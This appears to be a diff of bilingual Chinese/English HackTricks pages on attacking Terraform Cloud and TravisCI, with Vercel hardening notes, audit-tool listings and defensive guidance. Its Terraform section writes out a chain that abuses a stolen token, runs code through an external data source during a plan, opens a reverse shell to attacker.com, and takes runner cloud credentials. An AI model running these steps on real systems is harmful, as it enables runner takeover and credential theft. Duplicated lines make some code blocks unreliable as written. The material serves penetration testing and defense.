- Discover workspace and VCS settings via the TFC API:
```bash
export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
```
- 在 speculative plan 期间触发 code 执行,使用 external data source 和 Terraform Cloud "cloud" block 针对 VCS-backed workspace
- Trigger code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace:
```hcl
terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}
data "external" "exec" {
program = ["bash", "./rsync.sh"]
program = ["bash", "./rsync.sh"]
}
```
用于在 TFC runner 上获取 reverse shell 的 rsync.sh 示例:
Example rsync.sh to obtain a reverse shell on the TFC runner:
```bash
#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'
```
在临时 runner 上运行一个模拟计划以执行该程序:
Run a speculative plan to execute the program on the ephemeral runner:
```bash
terraform init
terraform plan
```
- Enumerate and exfiltrate 注入到 runner 的 cloud credentials。运行时TFC 会通过文件和 environment variables 注入 provider credentials
- Enumerate and exfiltrate injected cloud credentials from the runner. During runs, TFC injects provider credentials via files and environment variables:
```bash
env | grep -i gcp || true
env | grep -i aws || true
```
Expected files on the runner working directory:
- GCP:
- `tfc-google-application-credentials` (Workload Identity Federation JSON 配置文件)
- `tfc-gcp-token` (短期 GCP 访问令牌)
- `tfc-google-application-credentials` (Workload Identity Federation JSON config)
- `tfc-gcp-token` (short-lived GCP access token)
- AWS:
- `tfc-aws-shared-config` (web identity/OIDC 角色假设配置)
- `tfc-aws-token` (短期令牌;某些组织可能使用静态密钥)
- `tfc-aws-shared-config` (web identity/OIDC role assumption config)
- `tfc-aws-token` (short-lived token; some orgs may use static keys)
- 使用这些短期凭证以带外方式绕过 VCS 检查:
- Use the short-lived credentials out-of-band to bypass VCS gates:
GCP (gcloud):
```bash
export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>
```
AWS (AWS CLI):
```bash
export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity
```
使用这些凭证,攻击者可以直接使用本地 CLI 创建/修改/销毁资源,绕过通过 VCS 阻止 `apply` 的基于 PR 的工作流。
- 防御建议:
- 对 TFC 用户/团队和令牌应用最小权限原则。审计成员资格,避免将过多成员设为 owner。
- 在可行情况下,限制对敏感 VCS 支持的 workspaces 的 `plan` 权限。
- 使用 Sentinel 策略强制实施 provider/data source 的允许列表,以阻止 `data "external"` 或未知 providers。参见 HashiCorp 关于 provider 过滤的指导。
- 优先使用 OIDC/WIF 而非静态云凭证;将 runners 视为敏感实体。监控推测性 `plan` 运行和意外出站流量。
- 检测 `tfc-*` 凭证工件的外泄,并在 plan 期间对可疑的 `external` 程序使用发出告警。
With these creds, attackers can create/modify/destroy resources directly using native CLIs, sidestepping PR-based workflows that block `apply` via VCS.
- Defensive guidance:
- Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners.
- Restrict `plan` permission on sensitive VCS-backed workspaces where feasible.
- Enforce provider/data source allowlists with Sentinel policies to block `data "external"` or unknown providers. See HashiCorp guidance on provider filtering.
- Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress.
- Detect exfiltration of `tfc-*` credential artifacts and alert on suspicious `external` program usage during plans.
## 攻破 Terraform Cloud
## Compromising Terraform Cloud
### 使用 token
### Using a token
As **[explained in this post](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)**terraform CLI **`~/.terraform.d/credentials.tfrc.json`** 以明文存储 tokens。窃取此 token 可使攻击者在该 token 的作用域内冒充该用户。
As **[explained in this post](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)**, terraform CLI stores tokens in plaintext at **`~/.terraform.d/credentials.tfrc.json`**. Stealing this token lets an attacker impersonate the user within the tokens scope.
Using this token it's possible to get the org/workspace with:
使用该 token 可以获取 org/workspace命令如下
```bash
GET https://app.terraform.io/api/v2/organizations/acmecorp/workspaces/gcp-infra-prod
Authorization: Bearer <TF_TOKEN>
```
然后就可以使用 **`terraform plan`** 运行任意代码,正如前一章所述。
### 逃逸到云端
Then it's possible to run arbitrary code using **`terraform plan`** as explained in the previous chapter.
如果 runner 位于某个云环境中,就有可能获取附加到 runner 的主体principal的令牌并在带外使用。
### Escaping to the cloud
Then, if the runner is located in some cloud environment, it's possible to obtain a token of the principal attached to the runner and use it out of band.
- **GCP files (present in current run working directory)**
- `tfc-google-application-credentials` — JSON 配置,用于 Workload Identity Federation(WIF),告诉 Google 如何交换外部身份。
- `tfc-gcp-token`短期有效(≈1 hour)的 GCP 访问令牌,被上者引用
- `tfc-google-application-credentials` — JSON config for Workload Identity Federation(WIF) that tells Google how to exchange the external identity.
- `tfc-gcp-token`shortlived (≈1 hour) GCP access token referenced by the above
- **AWS files**
- `tfc-aws-shared-config`用于 web identity federation/OIDC role assumption 的 JSON优先于静态密钥
- `tfc-aws-token` — 短期令牌,或在配置错误时可能是静态 IAM 密钥。
- `tfc-aws-shared-config`JSON for web identity federation/OIDC role assumption
(preferred over static keys).
- `tfc-aws-token` — shortlived token, or potentially static IAM keys if misconfigured.
## 自动审计工具
## Automatic Audit Tools
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
Snyk 提供一个全面的 Infrastructure as Code (IaC) 扫描解决方案,用于检测 TerraformCloudFormationKubernetes 以及其他 IaC 格式中的漏洞和配置错误。
Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
- **Features:**
- 实时扫描安全漏洞和合规性问题。
- 与版本控制系统集成(GitHubGitLabBitbucket)。
- 自动生成修复的 pull requests
- 提供详细的修复建议。
- **Sign Up:** [Snyk](https://snyk.io/) 上创建一个账户。
- Real-time scanning for security vulnerabilities and compliance issues.
- Integration with version control systems (GitHub, GitLab, Bitbucket).
- Automated fix pull requests.
- Detailed remediation advice.
- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
**Checkov** 是一个针对基础设施即代码 (IaC) 的静态代码分析工具,同时也是用于镜像和开源包的软件成分分析 (SCA) 工具。
**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
它扫描使用 [Terraform](https://terraform.io/)[Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md)[Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md)[AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md)[Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md)[Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md)[Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md)[Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md)[Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md)[Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md)[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md)[ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) [OpenTofu](https://opentofu.org/) 配置的云基础设施,并使用基于图的扫描检测安全和合规性错误配置。
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
它执行 [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md),对开源包和镜像进行 Common Vulnerabilities and Exposures (CVEs) 的扫描。
```bash
pip install checkov
checkov -d /path/to/folder
```
### [terraform-compliance](https://github.com/terraform-compliance/cli)
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` 是一个轻量级的、以安全和合规为重点的针对 terraform 的测试框架,用于为你的 infrastructure-as-code 提供负向测试能力。
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
- **合规性:** 确保已实现的代码遵循安全标准以及你自定义的标准
- **行为驱动开发:** 我们几乎对所有东西都使用 BDD为什么不对 IaC 也这样做?
- **可移植:** 只需通过 `pip` 安装或通过 `docker` 运行。See [Installation](https://terraform-compliance.com/pages/installation/)
- **预部署:** 它在部署之前验证你的代码
- **易于集成:** 它可以在你的 pipeline(或在 git hooks 中)运行,以确保所有部署都经过验证。
- **职责分离:** 你可以将测试保存在不同的仓库中,由另一个团队负责。
- **compliance:** Ensure the implemented code is following security standards, your own custom standards
- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** it validates your code before it is deployed
- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
> [!NOTE]
> 不幸的是,如果代码使用了一些你无权访问的 providers你将无法执行 `terraform plan` 并运行此工具。
> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
### [tfsec](https://github.com/aquasecurity/tfsec)
摘自 [**docs**](https://github.com/aquasecurity/tfsec)tfsec 使用静态分析你的 terraform 代码来发现潜在的错误配置。
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
- ⛔ Hundreds of built-in rules
- 🪆 Scans modules (local and remote)
- Evaluates HCL expressions as well as literal values
- ↪️ Evaluates Terraform functions e.g. `concat()`
- 🔗 Evaluates relationships between Terraform resources
- 🧰 Compatible with the Terraform CDK
- 🙅 Applies (and embellishes) user-defined Rego policies
- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
- 🛠️ Configurable (via CLI flags and/or config file)
- ⚡ Very fast, capable of quickly scanning huge repositories
- ☁️ 检查主要(以及部分次要)云提供商中的错误配置
- ⛔ 数百条内置规则
- 🪆 扫描模块(本地和远程)
- 评估 HCL 表达式以及字面值
- ↪️ 评估 Terraform 函数,例如 `concat()`
- 🔗 评估 Terraform 资源之间的关系
- 🧰 兼容 Terraform CDK
- 🙅 应用(并增强)用户定义的 Rego 策略
- 📃 支持多种输出格式lovely默认、JSON、SARIF、CSV、CheckStyle、JUnit、text、Gif。
- 🛠️ 可配置(通过 CLI 标志和/或配置文件)
- ⚡ 非常快速,能够快速扫描大型仓库
```bash
brew install tfsec
tfsec /path/to/folder
```
### [terrascan](https://github.com/tenable/terrascan)
Terrascan 是一个针对基础设施即代码Infrastructure as Code的静态代码分析器。Terrascan 允许您:
- 无缝扫描基础设施即代码中的错误配置。
- 监控已部署的云基础设施以发现可能引起安全态势漂移的配置更改,并支持恢复到安全态势。
- 检测安全漏洞和合规性违规。
- 在为云原生基础设施配置资源之前缓解风险。
- 可灵活在本地运行或与您的 CI\CD 集成。
```bash
brew install terrascan
terrascan scan -d /path/to/folder
```
### [KICKS](https://github.com/Checkmarx/kics)
在基础设施即代码 (infrastructure-as-code) 的开发周期早期,通过 Checkmarx 的 **KICS** 发现安全漏洞、合规问题和基础设施配置错误。
Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
**KICS** 代表 **K**eeping **I**nfrastructure as **C**ode **S**ecure它是开源的是任何云原生项目的必备工具。
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
### [Terrascan](https://github.com/tenable/terrascan)
From the [**docs**](https://github.com/tenable/terrascan)Terrascan 是一个用于基础设施即代码的静态代码分析器。Terrascan 允许你:
From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
- Seamlessly scan infrastructure as code for misconfigurations.
- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
- Detect security vulnerabilities and compliance violations.
- Mitigate risks before provisioning cloud native infrastructure.
- Offers flexibility to run locally or integrate with your CI\CD.
- 无缝扫描基础设施即代码以发现配置错误。
- 监控已配置的云基础设施以发现引入安全态偏移的配置更改,并支持恢复到安全配置。
- 检测安全漏洞和合规性违规。
- 在部署云原生基础设施之前缓解风险。
- 提供在本地运行或与你的 CI\CD 集成的灵活性。
```bash
brew install terrascan
```
## 参考资料
## References
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -406,12 +440,12 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
- [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce)
- [Terraform Cloud token abuse turns speculative plan into remote code execution](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)
- [Terraform Cloud 权限](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions)
- [Terraform Cloud API 显示 workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace)
- [AWS provider 配置](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration)
- [AWS CLI OIDC 角色假设](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc)
- [GCP provider Terraform Cloud 中使用](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud)
- [Terraform 敏感变量](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables)
- [Snyk Labs GitflopsTerraform 自动化平台的危险](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/)
- [Terraform Cloud permissions](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions)
- [Terraform Cloud API Show workspace](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace)
- [AWS provider configuration](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration)
- [AWS CLI OIDC role assumption](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc)
- [GCP provider Using Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud)
- [Terraform Sensitive variables](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables)
- [Snyk Labs Gitflops: dangers of Terraform automation platforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -2,7 +2,7 @@
{{#include ../banners/hacktricks-training.md}}
欢迎提交Github PR,解释如何从攻击者的角度(滥)用这些平台
Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
- Drone
- TeamCity
@@ -11,6 +11,9 @@
- Rancher
- Mesosphere
- Radicle
- 任何其他CI/CD平台...
- Any other CI/CD platform...
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,65 +1,68 @@
# TravisCI 安全
# TravisCI Security
{{#include ../../banners/hacktricks-training.md}}
## 什么是 TravisCI
## What is TravisCI
**Travis CI** 是一个 **托管****本地** **持续集成** 服务,用于构建和测试托管在多个 **不同 git 平台** 上的软件项目。
**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
{{#ref}}
basic-travisci-information.md
{{#endref}}
## 攻击
## Attacks
### 触发器
### Triggers
要发起攻击您首先需要知道如何触发构建。默认情况下TravisCI 会在 **推送和拉取请求****触发构建**
To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
![](<../../images/image (145).png>)
#### 定时任务
#### Cron Jobs
如果您可以访问该 web 应用程序,您可以 **设置定时任务来运行构建**,这对于持久性或触发构建可能很有用:
If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
![](<../../images/image (243).png>)
> [!NOTE]
> 根据 [this](https://github.com/travis-ci/travis-ci/issues/9162),似乎无法在 `.travis.yml` 中设置定时任务。
> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
### 第三方 PR
### Third Party PR
TravisCI 默认情况下禁用与来自第三方的 PR 共享环境变量,但有人可能会启用它,然后您可以创建 PR 到该仓库并提取机密:
TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
![](<../../images/image (208).png>)
### 转储机密
### Dumping Secrets
如 [**基本信息**](basic-travisci-information.md) 页面所述,有两种类型的机密。**环境变量机密**(在网页上列出)和 **自定义加密机密**,这些机密存储在 `.travis.yml` 文件中,采用 base64 编码(请注意,两个加密存储的最终都会作为环境变量出现在最终机器中)。
As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
- **枚举配置为环境变量的机密**,请转到 **项目****设置** 并检查列表。但是,请注意,在触发构建时,此处设置的所有项目环境变量都会出现。
- 要枚举 **自定义加密机密**,您可以做的最好的是 **检查 `.travis.yml` 文件**
- **枚举加密文件**,您可以检查仓库中的 **`.enc` 文件**,查找配置文件中类似于 `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` 的行,或在 **环境变量** 中查找 **加密的 iv 和密钥**,例如:
- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
![](<../../images/image (81).png>)
### TODO:
- 示例构建在 Windows/Mac/Linux 上运行反向 shell
- 示例构建在日志中泄露环境变量的 base64 编码
- Example build with reverse shell running on Windows/Mac/Linux
- Example build leaking the env base64 encoded in the logs
### TravisCI 企业版
### TravisCI Enterprise
如果攻击者进入一个使用 **TravisCI 企业版** 的环境(有关这是什么的更多信息,请参见 [**基本信息**](basic-travisci-information.md#travisci-enterprise)),他将能够 **在 Worker 中触发构建**。这意味着攻击者将能够从中横向移动到该服务器,从而能够:
If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
- 逃离到主机?
- 破坏 kubernetes
- 破坏同一网络中运行的其他机器?
- 破坏新的云凭证?
- escape to the host?
- compromise kubernetes?
- compromise other machines running in the same network?
- compromise new cloud credentials?
## 参考
## References
- [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,45 +1,48 @@
# 基本 TravisCI 信息
# Basic TravisCI Information
{{#include ../../banners/hacktricks-training.md}}
## 访问
## Access
TravisCI 直接与不同的 git 平台集成,如 GithubBitbucketAssembla Gitlab。它会要求用户授予 TravisCI 访问他想要与 TravisCI 集成的仓库的权限。
TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
例如,在 Github 中,它会请求以下权限:
For example, in Github it will ask for the following permissions:
- `user:email`(只读)
- `read:org`(只读)
- `repo`:授予对公共和私有仓库及组织的代码、提交状态、协作者和部署状态的读写访问权限。
- `user:email` (read-only)
- `read:org` (read-only)
- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
## 加密秘密
## Encrypted Secrets
### 环境变量
### Environment Variables
TravisCI 中,与其他 CI 平台一样,可以在仓库级别**保存秘密**,这些秘密将被加密保存,并在执行构建的机器的**环境变量**中**解密并推送**。
In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
![](<../../images/image (203).png>)
可以指示**秘密将可用的分支**(默认是所有)以及 TravisCI 是否**应隐藏其值**,如果它出现在**日志中**(默认会隐藏)。
It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
### 自定义加密秘密
### Custom Encrypted Secrets
对于**每个仓库**TravisCI 生成一个**RSA 密钥对****保留**私钥,并将仓库的**公钥提供给**有权访问该仓库的人。
For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repositorys **public key available** to those who have **access** to the repository.
You can access the public key of one repo with:
您可以通过以下方式访问一个仓库的公钥:
```
travis pubkey -r <owner>/<repo_name>
travis pubkey -r carlospolop/t-ci-test
```
然后,您可以使用此设置来**加密秘密并将其添加到您的 `.travis.yaml`**。这些秘密将在**构建运行时解密**并可在**环境变量**中访问。
Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
![](<../../images/image (139).png>)
请注意,以这种方式加密的秘密不会出现在设置的环境变量中。
Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
### 自定义加密文件
### Custom Encrypted Files
Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
与之前一样TravisCI 还允许**加密文件并在构建期间解密它们**
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
@@ -49,7 +52,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -57,32 +60,36 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
注意,当加密文件时,将在仓库中配置 2 个环境变量,例如:
Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
![](<../../images/image (170).png>)
## TravisCI 企业版
## TravisCI Enterprise
Travis CI 企业版是 **Travis CI 的本地版本**,您可以在 **您的基础设施中部署**。可以将其视为 Travis CI 的“服务器”版本。使用 Travis CI 可以在您可以根据需要配置和保护的环境中启用易于使用的持续集成/持续部署 (CI/CD) 系统。
Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the server version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
**Travis CI 企业版由两个主要部分组成:**
**Travis CI Enterprise consists of two major parts:**
1. TCI **服务**(或 TCI 核心服务),负责与版本控制系统的集成、授权构建、调度构建作业等。
2. TCI **工作节点**和构建环境镜像(也称为操作系统镜像)。
1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
2. TCI **Worker** and build environment images (also called OS images).
**TCI 核心服务需要以下内容:**
**TCI Core services require the following:**
1. 一个 **PostgreSQL11**(或更高版本)数据库。
2. 部署 Kubernetes 集群所需的基础设施;如果需要,可以在服务器集群中或单台机器上部署。
3. 根据您的设置,您可能希望自行部署和配置某些组件,例如 RabbitMQ - 有关更多详细信息,请参见 [设置 Travis CI 企业版](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/)
1. A **PostgreSQL11** (or later) database.
2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
**TCI 工作节点需要以下内容:**
**TCI Worker requires the following:**
1. 一个基础设施,可以在其中部署包含 **工作节点和链接的构建镜像** 的 docker 镜像。
2. 连接到某些 Travis CI 核心服务组件 - 有关更多详细信息,请参见 [设置工作节点](https://docs.travis-ci.com/user/enterprise/setting-up-worker/)
1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
部署的 TCI 工作节点和构建环境操作系统镜像的数量将决定您基础设施中 Travis CI 企业版部署的总并发容量。
The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
![](<../../images/image (199).png>)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,436 +2,439 @@
{{#include ../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
Vercel 中,**团队**是属于客户的完整 **环境**,而 **项目** 是一个 **应用程序**
In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
对于 **Vercel** 的加固审查,您需要请求具有 **查看者角色权限** 的用户,或者至少对项目具有 **项目查看者权限** 以进行检查(如果您只需要检查项目而不需要检查团队配置)。
For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
## 项目设置
## Project Settings
### 一般
### General
**目的:** 管理基本项目设置,如项目名称、框架和构建配置。
**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
#### 安全配置:
#### Security Configurations:
- **转移**
- **错误配置:** 允许将项目转移到另一个团队
- **风险:** 攻击者可能会窃取项目
- **删除项目**
- **错误配置:** 允许删除项目
- **风险:** 删除项目
- **Transfer**
- **Misconfiguration:** Allows to transfer the project to another team
- **Risk:** An attacker could steal the project
- **Delete Project**
- **Misconfiguration:** Allows to delete the project
- **Risk:** Delete the prject
---
### 域名
### Domains
**目的:** 管理自定义域名、DNS 设置和 SSL 配置。
**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
#### 安全配置:
#### Security Configurations:
- **DNS 配置错误**
- **错误配置:** 指向恶意服务器的错误 DNS 记录A、CNAME
- **风险:** 域名劫持、流量拦截和网络钓鱼攻击。
- **SSL/TLS 证书管理**
- **错误配置:** 使用弱或过期的 SSL/TLS 证书。
- **风险:** 易受中间人MITM攻击危及数据完整性和机密性。
- **DNSSEC 实施**
- **错误配置:** 未能启用 DNSSEC 或 DNSSEC 设置不正确。
- **风险:** 增加对 DNS 欺骗和缓存投毒攻击的易感性。
- **每个域名使用的环境**
- **错误配置:** 更改生产中域名使用的环境。
- **风险:** 暴露潜在的秘密或不应在生产中可用的功能。
- **DNS Configuration Errors**
- **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- **Risk:** Domain hijacking, traffic interception, and phishing attacks.
- **SSL/TLS Certificate Management**
- **Misconfiguration:** Using weak or expired SSL/TLS certificates.
